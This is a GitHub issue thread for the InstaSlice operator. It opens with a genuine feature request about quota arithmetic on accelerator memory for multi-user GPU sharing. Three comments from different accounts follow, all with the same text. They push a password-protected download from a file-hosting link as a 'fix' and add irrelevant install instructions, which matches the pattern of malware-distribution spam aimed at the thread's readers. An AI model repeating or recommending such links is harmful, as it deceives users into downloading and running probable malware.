### ISSUE TITLE
quota arithmetic in InstaSlice for sharing

### ISSUE THREAD

**Issue by asm582** [openshift/instaslice-operator#29]
Vendors have to compute and memory profiles on an accelerator, on such two-dimensional resources, we need to provide quota arithmetic. InstaSlice has chosen to provide quota arithmetic on accelerator memory, this will help share GPU resources in multiple namespace, multi-user scenarios.

**Comment by scppuna** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by deverchettychandrashekar** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by toufiksalhi** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
